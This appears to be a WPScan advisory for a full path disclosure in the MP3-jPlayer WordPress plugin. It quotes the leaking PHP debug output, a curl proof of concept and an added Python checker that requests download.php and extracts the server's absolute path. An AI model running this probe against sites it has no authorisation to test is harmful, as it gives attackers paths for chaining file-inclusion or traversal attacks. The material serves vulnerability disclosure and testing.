MP3-jPlayer <= 2.3.3 - Full Path Disclosure



Description
The debug output in download.php is echoed to the client without any authentication or capability check, so any remote user can obtain the web server's absolute filesystem path (built from $_SERVER['DOCUMENT_ROOT']) on WordPress sites with this plugin installed. On its own the path is low impact, but it gives an attacker the absolute paths needed to exploit other flaws such as local file inclusion or path traversal.

// download.php: the debug paragraph below is echoed back to the requester.
// The "Open:" line concatenates $_SERVER['DOCUMENT_ROOT'] with the requested
// file, so the absolute server path is disclosed to anyone who calls the script.
                $info = "<p>
                        Get: " . $mp3 . "<br />
                        Sent: " . $sent . "<br />
                        File: " . $file . "<br />
                        Open: " . $_SERVER['DOCUMENT_ROOT'] . $fp . "<br />
                        Root: " . $rooturl . "<br />
                        pID: " . $playerID . "<br />
                        Dbug: " . $dbug . "<br />
                        extension: " . $fileExtension . "</p>";
                echo $info;
Proof of Concept
$ curl http://www.example.com/wp-content/plugins/mp3-jplayer/download.php?mp3=.
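The following script is an added example for checking a site against this advisory; it is not part of the original entry or of the plugin. It builds the PoC URL from a site base URL and parses the debug paragraph that download.php echoes, pulling out the absolute path from the "Open:" line. The sample response embedded below is constructed to match the shape of the code above, not captured from a real site, and the document_root() helper assumes the plugin lives under <docroot>/wp-content/ (the standard WordPress layout).

```python
"""Check a response from mp3-jplayer's download.php for the full path disclosure."""
import re
from html import unescape
from urllib.parse import urljoin, urlencode
from urllib.request import urlopen

# Relative path of the vulnerable script inside a WordPress install (from the advisory).
DOWNLOAD_PHP = "wp-content/plugins/mp3-jplayer/download.php"

# Constructed sample response (not a real capture): the shape of the debug
# paragraph produced by the echo shown above when called with mp3=.
SAMPLE_RESPONSE = """<p>
Get: .<br />
Sent: <br />
File: .<br />
Open: /var/www/html/wp-content/plugins/mp3-jplayer/.<br />
Root: http://www.example.com/wp-content/plugins/mp3-jplayer/<br />
pID: 0<br />
Dbug: 1<br />
extension: </p>"""

# One "Label: value" pair per line, terminated by <br /> or the closing </p>.
FIELD_RE = re.compile(
    r"(Get|Sent|File|Open|Root|pID|Dbug|extension):\s*(.*?)\s*(?:<br />|</p>)", re.S)


def build_poc_url(site_url, mp3="."):
    """Reproduce the advisory's PoC request for a given WordPress base URL."""
    base = site_url.rstrip("/") + "/"
    return urljoin(base, DOWNLOAD_PHP) + "?" + urlencode({"mp3": mp3})


def parse_debug_block(body):
    """Return the Label: value pairs from the echoed debug paragraph, HTML-unescaped."""
    return {m.group(1): unescape(m.group(2)) for m in FIELD_RE.finditer(body)}


def disclosed_path(body):
    """Return the absolute server path echoed in 'Open:' (DOCUMENT_ROOT . $fp), or None.

    A response without the debug paragraph, or whose 'Open:' value is not an
    absolute Unix or Windows path, is treated as not vulnerable.
    """
    open_path = parse_debug_block(body).get("Open")
    if open_path and re.match(r"^(/|[A-Za-z]:[\\/])", open_path):
        return open_path
    return None


def document_root(path):
    """Assumption for illustration: the plugin sits under <docroot>/wp-content/,
    so everything before '/wp-content/' is $_SERVER['DOCUMENT_ROOT']."""
    idx = path.find("/wp-content/")
    return path[:idx] if idx != -1 else None


def check_site(site_url):
    """Fetch the PoC URL and return the disclosed path, or None (network access required)."""
    with urlopen(build_poc_url(site_url)) as resp:  # noqa: S310 - intentional test request
        body = resp.read().decode("utf-8", errors="replace")
    return disclosed_path(body)


if __name__ == "__main__":
    # Offline demonstration on the constructed sample.
    print(build_poc_url("http://www.example.com"))
    path = disclosed_path(SAMPLE_RESPONSE)
    print("disclosed path:", path)
    print("document root:", document_root(path) if path else None)
```

Run check_site("http://www.example.com") only against a site you are authorised to test; the offline part of the script exercises the parser on the constructed sample so the extraction logic can be verified without touching a live host.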

Affects Plugin mp3-jplayer

References

URL http://www.vapid.dhs.org/advisory.php?v=149

Classification

Type FPD
OWASP Top 10 A6: Sensitive Data Exposure
CWE CWE-200

Miscellaneous

Submitter Larry W. Cashdollar
Submitter Twitter _larry0
Verified No
WPVDB ID 8144

Timeline

Publicly Published 2015-08-06
Added 2015-08-10
Last Updated 2015-08-10

Copyright & License

Copyright All data and resources contained within this page and this web site are Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.